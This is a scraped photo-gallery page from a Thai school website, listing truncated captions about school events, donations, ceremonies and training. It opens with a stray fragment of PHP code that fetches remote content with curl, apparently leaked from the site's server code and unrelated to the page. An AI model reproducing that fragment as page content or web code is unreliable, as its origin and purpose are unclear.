$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

คุณมงคล และเจ้าหน้าที่ จาก..บ.เมืองไทยประกันชีวิต มอบคอมพิวเ..

ปรับปรุงอาคารสถานที่ แผนกอนุบาล

ท่าน พ.ต.ท.สุพล ฟูมูลเจริญ ประธานกรรมการสถานศึกษา มอบต้น*ส้ม..

อบรมโครงการพัฒนาสมรรถนะของลูกเสือเพื่อดูแลกลุ่มเปราะบางในสัง..

กิจกรรมวันสุนทรภู่ ประจำปีการศึกษา 2566

ตัวแทนคณะครูร่วมวางหรีดเคารพศพ พ่อแก้ว เมืองปิง พ่อของผอ.ทัก..

กิจกรรมวันต่อต้านยาเสพติดโลก

ขอขอบคุณภาคีเครือข่ายจากวิทยาลัยสารพัดช่างเชียงใหม่ มาให้บริ..

ตัวแทนฯ รร. สันทรายหลวง ร่วมแสดงความเสียใจกับท่าน ผอ. ณรงค์แ..

กิจกรรมงานเกษตร Active Learning

เจ้าหน้าที่การเงินและพัสดุ สพป.ชม.เขต.2 ให้ความอนุเคราะห์มาช..

ศึกษาดูงานการเตรียมความพร้อมรับการประเมินฯ รร. พระราชทาน ระด..